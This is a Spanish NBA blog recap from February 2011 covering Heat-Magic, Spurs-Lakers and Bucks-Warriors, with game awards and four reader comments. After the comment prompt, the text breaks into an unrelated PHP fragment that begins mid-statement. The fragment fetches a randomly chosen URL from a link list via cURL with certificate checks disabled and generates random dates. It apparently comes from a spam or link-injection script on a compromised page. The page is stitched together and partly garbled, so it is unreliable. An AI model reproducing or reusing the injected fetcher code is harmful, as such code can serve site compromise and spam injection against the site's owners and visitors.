La Crónica (03/02/2011)

04 de February de 2011 por txusma

Jornada de 3 partidos que debería hacer sido de 2. Programar un Bucks-Warriors el mismo día que un Heat-Magic y un Spurs-Lakers es dejar en evidencia tanto a los ciervos como a los guerreros. Y es que los otros dos partidos fueron increíbles.

En Orlando, Lebron James estuvo a punto de ver como una soberana tontería tiraba por la borda un partido suyo casi perfecto (104-100). El de Akron anotó 23 puntos en el primer cuarto, superando la cinquentena al finalizar el partido, pero no pudo vivir un encuentro nada plácido. Los Heat llegaron a humillar los Magic superándoles de 19 puntos en su propia casa a 8 minutos para el final. A partir de aquí la debacle. Un parcial de 19-4 mete de nuevo a Orlando en el partido hasta el punto de colocarse a 3 puntos a falta de 9.4 segundos. Cualquier equipo que quiera llevarse un anillo ha de saber jugar este tipo de situaciones y ayer los Heat demostraron que han de madurar todavía mucho perdiendo el balón en el saque de fondo y cediendo a los Magic la posibilidad de empatar el partido.

¿Y qué decir del Spurs-Lakers? Emoción a raudales con canastas claves en el último minuto de Odom y Gasol que ponían a los Lakers 1 arriba a falta de 22 segundos, intentos de Ginobili, Parker y Duncan para anotar la canasta ganadora, incapacidad de los Lakers para cerrar el rebote permitiendo a los Spurs gozar de oportunidades una y otra vez y finalmente, golpe de dudas del veteranísimo Antonio McDyess para llevarse el partido (89-88). Como esto pase en un partido de Playoffs, mi corazón no lo soportará.

Y en el tercer partido de la noche victoria de los Warriors, 94-100, con Ellis en sus días buenos y el trío Mbah-a-Moute, Ilyasova, Delfino  dándole la réplica.

PREMIOS

MVP: Sin discusión. 51 puntos de “King” James aderezados con 11 rebotes y 8 asistencias. Sencillamente brutal.

Rookie:Por decir uno, Gary Neal y sus 6 puntos y 3 rebotes. Eso sí, la canasta para cerrar el primer cuarto, impresionante.

Sorpresa: El partido de Mbah-a-Moute, destacado en el “Esfuerzo en vano” del día.

Decepción: JJ Reddik colaboró en la derrota de su equipo con un fabuloso 1 de 8. ¿Hay jugador más irregular?

Esfuerzo en vano: Con 15 puntos, 19 rebotes y 5 asistencias, Mbah-a-Moute jugó anoche el partido de su vida. Ilyasova (23-13) y Delfino (20-5-8) también pusieron de su parte pero no fue suficiente para llevarse el partido.

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. Lassad_Balon_de_Oro dice:
    #1

    Hola, solo quiero comentar que me encanta vuestra labor y el blog. Mi trabajo no me permite madrugar y ver partidos, por ello nunca comento, pero os leo a diario; y haceis que me mantenga informado y actualizado sobre la mejor liga de baloncesto del mundo.
    Gracias, y seguid así muchos años.

      Citar

  2. MagicJohnson32 dice:
    #2

    La madre que hizo a los Spurs!!!! Ajjj, lo peor es que estaba clarísimo que la última jugada acabaría así. 3 rebotes perdidos, y Bynum en el banquillo. En fin…

    Gracias Lassad de parte de todos los que hacen, en menor o mayor medida, TJNBA. De verdad que se agradecen este tipo de comentarios y animan mucho.

      Citar

  3. Denise dice:
    #3

    Los Magic no tienen nada que hacer frente a los Heat. Púeden ganar algun partido, pero en una serie a 7 partidos, esto se resolvería por un 4-1, 4-2. En fin, otro año será…
    Si le das a los Spurs 4 opciones para ganar el partido, pues pasa lo que pasa.

      Citar

  4. Scriers dice:
    #4

    Oye que yo también os lo agradezco! Más que nada pq tener anälisis y opiniön tan pronto y tan a mano, es una bendiciön pal seguidor de Nba.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>